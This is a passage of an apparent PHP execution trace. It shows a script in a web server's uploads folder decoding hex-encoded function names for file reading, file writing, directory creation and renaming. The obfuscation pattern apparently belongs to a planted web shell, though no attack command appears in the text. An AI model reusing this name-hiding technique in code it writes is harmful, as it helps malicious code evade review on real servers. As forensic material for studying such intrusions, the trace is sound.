3	226	R			'i'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'i'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	227	0	0.010827	720232	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'73'
3	227	1	0.010838	720280
3	227	R			115
3	228	0	0.010850	720200	chr	0		/var/www/html/uploads/1CTT.php	204	1	115
3	228	1	0.010861	720240
3	228	R			's'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 's'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	229	0	0.010891	720232	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'74'
3	229	1	0.010903	720280
3	229	R			116
3	230	0	0.010916	720200	chr	0		/var/www/html/uploads/1CTT.php	204	1	116
3	230	1	0.010926	720240
3	230	R			't'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 't'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	231	0	0.010957	720232	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'73'
3	231	1	0.010969	720280
3	231	R			115
3	232	0	0.010981	720200	chr	0		/var/www/html/uploads/1CTT.php	204	1	115
3	232	1	0.010992	720240
3	232	R			's'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 's'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
2	210	1	0.011023	720200
2	210	R			'file_exists'
1		A						/var/www/html/uploads/1CTT.php	7	$func[12] = 'file_exists'
1		A						/var/www/html/uploads/1CTT.php	6	$i++
2	233	0	0.011058	720200	dehex	1		/var/www/html/uploads/1CTT.php	7	1	'66696c655f7075745f636f6e74656e7473'
2		A						/var/www/html/uploads/1CTT.php	201	$r = ''
2		A						/var/www/html/uploads/1CTT.php	202	$len = 33
2		A						/var/www/html/uploads/1CTT.php	203	$i = 0
3	234	0	0.011101	720232	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'66'
3	234	1	0.011114	720280
3	234	R			102
3	235	0	0.011127	720200	chr	0		/var/www/html/uploads/1CTT.php	204	1	102
3	235	1	0.011138	720240
3	235	R			'f'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'f'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	236	0	0.011170	720264	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'69'
3	236	1	0.011182	720312
3	236	R			105
3	237	0	0.011194	720232	chr	0		/var/www/html/uploads/1CTT.php	204	1	105
3	237	1	0.011206	720272
3	237	R			'i'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'i'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	238	0	0.011236	720264	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'6c'
3	238	1	0.011248	720312
3	238	R			108
3	239	0	0.011260	720232	chr	0		/var/www/html/uploads/1CTT.php	204	1	108
3	239	1	0.011272	720272
3	239	R			'l'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'l'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	240	0	0.011302	720264	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'65'
3	240	1	0.011313	720312
3	240	R			101
3	241	0	0.011326	720232	chr	0		/var/www/html/uploads/1CTT.php	204	1	101
3	241	1	0.011337	720272
3	241	R			'e'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	242	0	0.011367	720264	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'5f'
3	242	1	0.011380	720312
3	242	R			95
3	243	0	0.011392	720232	chr	0		/var/www/html/uploads/1CTT.php	204	1	95
3	243	1	0.011403	720272
3	243	R			'_'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= '_'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	244	0	0.011433	720264	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'70'
3	244	1	0.011445	720312
3	244	R			112
3	245	0	0.011457	720232	chr	0		/var/www/html/uploads/1CTT.php	204	1	112
3	245	1	0.011468	720272
3	245	R			'p'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'p'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	246	0	0.011498	720264	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'75'
3	246	1	0.011514	720312
3	246	R			117
3	247	0	0.011527	720232	chr	0		/var/www/html/uploads/1CTT.php	204	1	117
3	247	1	0.011538	720272
3	247	R			'u'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'u'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	248	0	0.011568	720264	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'74'
3	248	1	0.011580	720312
3	248	R			116
3	249	0	0.011592	720232	chr	0		/var/www/html/uploads/1CTT.php	204	1	116
3	249	1	0.011603	720272
3	249	R			't'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 't'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	250	0	0.011633	720272	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'5f'
3	250	1	0.011644	720320
3	250	R			95
3	251	0	0.011657	720240	chr	0		/var/www/html/uploads/1CTT.php	204	1	95
3	251	1	0.011668	720280
3	251	R			'_'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= '_'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	252	0	0.011698	720272	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'63'
3	252	1	0.011709	720320
3	252	R			99
3	253	0	0.011722	720240	chr	0		/var/www/html/uploads/1CTT.php	204	1	99
3	253	1	0.011733	720280
3	253	R			'c'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'c'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	254	0	0.011763	720272	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'6f'
3	254	1	0.011775	720320
3	254	R			111
3	255	0	0.011787	720240	chr	0		/var/www/html/uploads/1CTT.php	204	1	111
3	255	1	0.011798	720280
3	255	R			'o'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'o'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	256	0	0.011828	720272	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'6e'
3	256	1	0.011840	720320
3	256	R			110
3	257	0	0.011852	720240	chr	0		/var/www/html/uploads/1CTT.php	204	1	110
3	257	1	0.011864	720280
3	257	R			'n'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'n'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	258	0	0.011894	720272	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'74'
3	258	1	0.011905	720320
3	258	R			116
3	259	0	0.011917	720240	chr	0		/var/www/html/uploads/1CTT.php	204	1	116
3	259	1	0.011928	720280
3	259	R			't'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 't'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	260	0	0.011980	720272	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'65'
3	260	1	0.011992	720320
3	260	R			101
3	261	0	0.012004	720240	chr	0		/var/www/html/uploads/1CTT.php	204	1	101
3	261	1	0.012016	720280
3	261	R			'e'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	262	0	0.012046	720272	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'6e'
3	262	1	0.012057	720320
3	262	R			110
3	263	0	0.012069	720240	chr	0		/var/www/html/uploads/1CTT.php	204	1	110
3	263	1	0.012081	720280
3	263	R			'n'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'n'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	264	0	0.012110	720272	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'74'
3	264	1	0.012122	720320
3	264	R			116
3	265	0	0.012134	720240	chr	0		/var/www/html/uploads/1CTT.php	204	1	116
3	265	1	0.012146	720280
3	265	R			't'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 't'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	266	0	0.012176	720280	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'73'
3	266	1	0.012188	720328
3	266	R			115
3	267	0	0.012200	720248	chr	0		/var/www/html/uploads/1CTT.php	204	1	115
3	267	1	0.012211	720288
3	267	R			's'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 's'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
2	233	1	0.012241	720248
2	233	R			'file_put_contents'
1		A						/var/www/html/uploads/1CTT.php	7	$func[13] = 'file_put_contents'
1		A						/var/www/html/uploads/1CTT.php	6	$i++
2	268	0	0.012279	720248	dehex	1		/var/www/html/uploads/1CTT.php	7	1	'66696c655f6765745f636f6e74656e7473'
2		A						/var/www/html/uploads/1CTT.php	201	$r = ''
2		A						/var/www/html/uploads/1CTT.php	202	$len = 33
2		A						/var/www/html/uploads/1CTT.php	203	$i = 0
3	269	0	0.012322	720280	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'66'
3	269	1	0.012334	720328
3	269	R			102
3	270	0	0.012347	720248	chr	0		/var/www/html/uploads/1CTT.php	204	1	102
3	270	1	0.012358	720288
3	270	R			'f'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'f'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	271	0	0.012388	720312	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'69'
3	271	1	0.012401	720360
3	271	R			105
3	272	0	0.012413	720280	chr	0		/var/www/html/uploads/1CTT.php	204	1	105
3	272	1	0.012424	720320
3	272	R			'i'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'i'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	273	0	0.012454	720312	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'6c'
3	273	1	0.012466	720360
3	273	R			108
3	274	0	0.012478	720280	chr	0		/var/www/html/uploads/1CTT.php	204	1	108
3	274	1	0.012489	720320
3	274	R			'l'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'l'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	275	0	0.012520	720312	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'65'
3	275	1	0.012532	720360
3	275	R			101
3	276	0	0.012544	720280	chr	0		/var/www/html/uploads/1CTT.php	204	1	101
3	276	1	0.012555	720320
3	276	R			'e'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	277	0	0.012584	720312	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'5f'
3	277	1	0.012596	720360
3	277	R			95
3	278	0	0.012608	720280	chr	0		/var/www/html/uploads/1CTT.php	204	1	95
3	278	1	0.012619	720320
3	278	R			'_'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= '_'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	279	0	0.012650	720312	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'67'
3	279	1	0.012661	720360
3	279	R			103
3	280	0	0.012673	720280	chr	0		/var/www/html/uploads/1CTT.php	204	1	103
3	280	1	0.012684	720320
3	280	R			'g'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'g'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	281	0	0.012714	720312	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'65'
3	281	1	0.012726	720360
3	281	R			101
3	282	0	0.012738	720280	chr	0		/var/www/html/uploads/1CTT.php	204	1	101
3	282	1	0.012749	720320
3	282	R			'e'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	283	0	0.012778	720312	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'74'
3	283	1	0.012790	720360
3	283	R			116
3	284	0	0.012803	720280	chr	0		/var/www/html/uploads/1CTT.php	204	1	116
3	284	1	0.012814	720320
3	284	R			't'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 't'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	285	0	0.012844	720320	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'5f'
3	285	1	0.012856	720368
3	285	R			95
3	286	0	0.012868	720288	chr	0		/var/www/html/uploads/1CTT.php	204	1	95
3	286	1	0.012879	720328
3	286	R			'_'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= '_'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	287	0	0.012909	720320	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'63'
3	287	1	0.012921	720368
3	287	R			99
3	288	0	0.012933	720288	chr	0		/var/www/html/uploads/1CTT.php	204	1	99
3	288	1	0.012944	720328
3	288	R			'c'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'c'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	289	0	0.012973	720320	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'6f'
3	289	1	0.012988	720368
3	289	R			111
3	290	0	0.013000	720288	chr	0		/var/www/html/uploads/1CTT.php	204	1	111
3	290	1	0.013011	720328
3	290	R			'o'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'o'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	291	0	0.013041	720320	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'6e'
3	291	1	0.013053	720368
3	291	R			110
3	292	0	0.013065	720288	chr	0		/var/www/html/uploads/1CTT.php	204	1	110
3	292	1	0.013077	720328
3	292	R			'n'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'n'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	293	0	0.013106	720320	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'74'
3	293	1	0.013118	720368
3	293	R			116
3	294	0	0.013130	720288	chr	0		/var/www/html/uploads/1CTT.php	204	1	116
3	294	1	0.013142	720328
3	294	R			't'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 't'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	295	0	0.013172	720320	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'65'
3	295	1	0.013183	720368
3	295	R			101
3	296	0	0.013196	720288	chr	0		/var/www/html/uploads/1CTT.php	204	1	101
3	296	1	0.013207	720328
3	296	R			'e'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	297	0	0.013237	720320	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'6e'
3	297	1	0.013248	720368
3	297	R			110
3	298	0	0.013260	720288	chr	0		/var/www/html/uploads/1CTT.php	204	1	110
3	298	1	0.013272	720328
3	298	R			'n'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'n'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	299	0	0.013301	720320	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'74'
3	299	1	0.013313	720368
3	299	R			116
3	300	0	0.013325	720288	chr	0		/var/www/html/uploads/1CTT.php	204	1	116
3	300	1	0.013336	720328
3	300	R			't'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 't'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	301	0	0.013366	720328	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'73'
3	301	1	0.013377	720376
3	301	R			115
3	302	0	0.013390	720296	chr	0		/var/www/html/uploads/1CTT.php	204	1	115
3	302	1	0.013401	720336
3	302	R			's'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 's'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
2	268	1	0.013431	720296
2	268	R			'file_get_contents'
1		A						/var/www/html/uploads/1CTT.php	7	$func[14] = 'file_get_contents'
1		A						/var/www/html/uploads/1CTT.php	6	$i++
2	303	0	0.013465	720296	dehex	1		/var/www/html/uploads/1CTT.php	7	1	'6d6b646972'
2		A						/var/www/html/uploads/1CTT.php	201	$r = ''
2		A						/var/www/html/uploads/1CTT.php	202	$len = 9
2		A						/var/www/html/uploads/1CTT.php	203	$i = 0
3	304	0	0.013506	720328	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'6d'
3	304	1	0.013518	720376
3	304	R			109
3	305	0	0.013530	720296	chr	0		/var/www/html/uploads/1CTT.php	204	1	109
3	305	1	0.013542	720336
3	305	R			'm'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'm'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	306	0	0.013572	720360	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'6b'
3	306	1	0.013585	720408
3	306	R			107
3	307	0	0.013597	720328	chr	0		/var/www/html/uploads/1CTT.php	204	1	107
3	307	1	0.013608	720368
3	307	R			'k'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'k'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	308	0	0.013639	720360	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'64'
3	308	1	0.013651	720408
3	308	R			100
3	309	0	0.013663	720328	chr	0		/var/www/html/uploads/1CTT.php	204	1	100
3	309	1	0.013674	720368
3	309	R			'd'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'd'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	310	0	0.013710	720360	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'69'
3	310	1	0.013722	720408
3	310	R			105
3	311	0	0.013735	720328	chr	0		/var/www/html/uploads/1CTT.php	204	1	105
3	311	1	0.013746	720368
3	311	R			'i'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'i'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	312	0	0.013776	720360	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'72'
3	312	1	0.013788	720408
3	312	R			114
3	313	0	0.013800	720328	chr	0		/var/www/html/uploads/1CTT.php	204	1	114
3	313	1	0.013811	720368
3	313	R			'r'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'r'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
2	303	1	0.013841	720328
2	303	R			'mkdir'
1		A						/var/www/html/uploads/1CTT.php	7	$func[15] = 'mkdir'
1		A						/var/www/html/uploads/1CTT.php	6	$i++
2	314	0	0.013875	720328	dehex	1		/var/www/html/uploads/1CTT.php	7	1	'72656e616d65'
2		A						/var/www/html/uploads/1CTT.php	201	$r = ''
2		A						/var/www/html/uploads/1CTT.php	202	$len = 11
2		A						/var/www/html/uploads/1CTT.php	203	$i = 0
3	315	0	0.013915	720360	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'72'
3	315	1	0.013927	720408
3	315	R			114
3	316	0	0.013939	720328	chr	0		/var/www/html/uploads/1CTT.php	204	1	114
3	316	1	0.013951	720368
3	316	R			'r'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'r'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	317	0	0.013981	720392	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'65'
3	317	1	0.013993	720440
3	317	R			101
3	318	0	0.014005	720360	chr	0		/var/www/html/uploads/1CTT.php	204	1	101
3	318	1	0.014017	720400
3	318	R			'e'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	319	0	0.014047	720392	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'6e'
3	319	1	0.014059	720440
3	319	R			110
3	320	0	0.014071	720360	chr	0		/var/www/html/uploads/1CTT.php	204	1	110
3	320	1	0.014081	720400
3	320	R			'n'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'n'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	321	0	0.014111	720392	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'61'
3	321	1	0.014123	720440
3	321	R			97
3	322	0	0.014136	720360	chr	0		/var/www/html/uploads/1CTT.php	204	1	97
3	322	1	0.014148	720400
3	322	R			'a'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'a'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	323	0	0.014178	720392	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'6d'
3	323	1	0.014189	720440
3	323	R			109
3	324	0	0.014201	720360	chr	0		/var/www/html/uploads/1CTT.php	204	1	109
3	324	1	0.014213	720400
3	324	R			'm'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'm'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	325	0	0.014243	720392	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'65'
3	325	1	0.014253	720440
3	325	R			101
3	326	0	0.014265	720360	chr	0		/var/www/html/uploads/1CTT.php	204	1	101
3	326	1	0.014277	720400
3	326	R			'e'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
2	314	1	0.014307	720360
2	314	R			'rename'
1		A						/var/www/html/uploads/1CTT.php	7	$func[16] = 'rename'
1		A						/var/www/html/uploads/1CTT.php	6	$i++
2	327	0	0.014341	720360	dehex	1		/var/www/html/uploads/1CTT.php	7	1	'737472746f74696d65'
2		A						/var/www/html/uploads/1CTT.php	201	$r = ''
2		A						/var/www/html/uploads/1CTT.php	202	$len = 17
2		A						/var/www/html/uploads/1CTT.php	203	$i = 0
3	328	0	0.014382	720392	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'73'
3	328	1	0.014393	720440
3	328	R			115
3	329	0	0.014405	720360	chr	0		/var/www/html/uploads/1CTT.php	204	1	115
3	329	1	0.014417	720400
3	329	R			's'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 's'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	330	0	0.014451	720424	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'74'
3	330	1	0.014463	720472
3	330	R			116
3	331	0	0.014475	720392	chr	0		/var/www/html/uploads/1CTT.php	204	1	116
3	331	1	0.014486	720432
3	331	R			't'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 't'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	332	0	0.014516	720424	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'72'
3	332	1	0.014527	720472
3	332	R			114
3	333	0	0.014539	720392	chr	0		/var/www/html/uploads/1CTT.php	204	1	114
3	333	1	0.014550	720432
3	333	R			'r'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'r'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	334	0	0.014581	720424	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'74'
3	334	1	0.014592	720472
3	334	R			116
3	335	0	0.014604	720392	chr	0		/var/www/html/uploads/1CTT.php	204	1	116
3	335	1	0.014623	720432
3	335	R			't'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 't'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	336	0	0.014654	720424	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'6f'
3	336	1	0.014666	720472
3	336	R			111
3	337	0	0.014678	720392	chr	0		/var/www/html/uploads/1CTT.php	204	1	111
3	337	1	0.014690	720432
3	337	R			'o'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'o'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	338	0	0.014719	720424	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'74'
3	338	1	0.014730	720472
3	338	R			116
3	339	0	0.014742	720392	chr	0		/var/www/html/uploads/1CTT.php	204	1	116
3	339	1	0.014754	720432
3	339	R			't'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 't'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	340	0	0.014783	720424	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'69'
3	340	1	0.014795	720472
3	340	R			105
3	341	0	0.014807	720392	chr	0		/var/www/html/uploads/1CTT.php	204	1	105
3	341	1	0.014818	720432
3	341	R			'i'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'i'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	342	0	0.014848	720424	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'6d'
3	342	1	0.014859	720472
3	342	R			109
3	343	0	0.014871	720392	chr	0		/var/www/html/uploads/1CTT.php	204	1	109
3	343	1	0.014883	720432
3	343	R			'm'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'm'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	344	0	0.014913	720432	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'65'
3	344	1	0.014923	720480
3	344	R			101
3	345	0	0.014935	720400	chr	0		/var/www/html/uploads/1CTT.php	204	1	101
3	345	1	0.014947	720440
3	345	R			'e'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
2	327	1	0.014978	720400
2	327	R			'strtotime'
1		A						/var/www/html/uploads/1CTT.php	7	$func[17] = 'strtotime'
1		A						/var/www/html/uploads/1CTT.php	6	$i++
2	346	0	0.015012	720400	dehex	1		/var/www/html/uploads/1CTT.php	7	1	'68746d6c7370656369616c6368617273'
2		A						/var/www/html/uploads/1CTT.php	201	$r = ''
2		A						/var/www/html/uploads/1CTT.php	202	$len = 31
2		A						/var/www/html/uploads/1CTT.php	203	$i = 0
3	347	0	0.015054	720432	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'68'
3	347	1	0.015065	720480
3	347	R			104
3	348	0	0.015077	720400	chr	0		/var/www/html/uploads/1CTT.php	204	1	104
3	348	1	0.015089	720440
3	348	R			'h'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'h'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	349	0	0.015119	720464	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'74'
3	349	1	0.015132	720512
3	349	R			116
3	350	0	0.015144	720432	chr	0		/var/www/html/uploads/1CTT.php	204	1	116
3	350	1	0.015155	720472
3	350	R			't'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 't'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	351	0	0.015189	720464	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'6d'
3	351	1	0.015201	720512
3	351	R			109
3	352	0	0.015213	720432	chr	0		/var/www/html/uploads/1CTT.php	204	1	109
3	352	1	0.015225	720472
3	352	R			'm'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'm'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	353	0	0.015255	720464	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'6c'
3	353	1	0.015266	720512
3	353	R			108
3	354	0	0.015278	720432	chr	0		/var/www/html/uploads/1CTT.php	204	1	108
3	354	1	0.015290	720472
3	354	R			'l'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'l'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	355	0	0.015320	720464	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'73'
3	355	1	0.015331	720512
3	355	R			115
3	356	0	0.015343	720432	chr	0		/var/www/html/uploads/1CTT.php	204	1	115
3	356	1	0.015354	720472
3	356	R			's'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 's'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	357	0	0.015384	720464	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'70'
3	357	1	0.015395	720512
3	357	R			112
3	358	0	0.015407	720432	chr	0		/var/www/html/uploads/1CTT.php	204	1	112
3	358	1	0.015417	720472
3	358	R			'p'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'p'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	359	0	0.015446	720464	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'65'
3	359	1	0.015458	720512
3	359	R			101
3	360	0	0.015470	720432	chr	0		/var/www/html/uploads/1CTT.php	204	1	101
3	360	1	0.015481	720472
3	360	R			'e'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	361	0	0.015511	720464	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'63'
3	361	1	0.015522	720512
3	361	R			99
3	362	0	0.015534	720432	chr	0		/var/www/html/uploads/1CTT.php	204	1	99
3	362	1	0.015545	720472
3	362	R			'c'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'c'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	363	0	0.015574	720472	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'69'
3	363	1	0.015585	720520
3	363	R			105
3	364	0	0.015597	720440	chr	0		/var/www/html/uploads/1CTT.php	204	1	105
3	364	1	0.015608	720480
3	364	R			'i'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'i'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	365	0	0.015637	720472	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'61'
3	365	1	0.015650	720520
3	365	R			97
3	366	0	0.015663	720440	chr	0		/var/www/html/uploads/1CTT.php	204	1	97
3	366	1	0.015674	720480
3	366	R			'a'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'a'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	367	0	0.015703	720472	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'6c'
3	367	1	0.015715	720520
3	367	R			108
3	368	0	0.015727	720440	chr	0		/var/www/html/uploads/1CTT.php	204	1	108
3	368	1	0.015737	720480
3	368	R			'l'
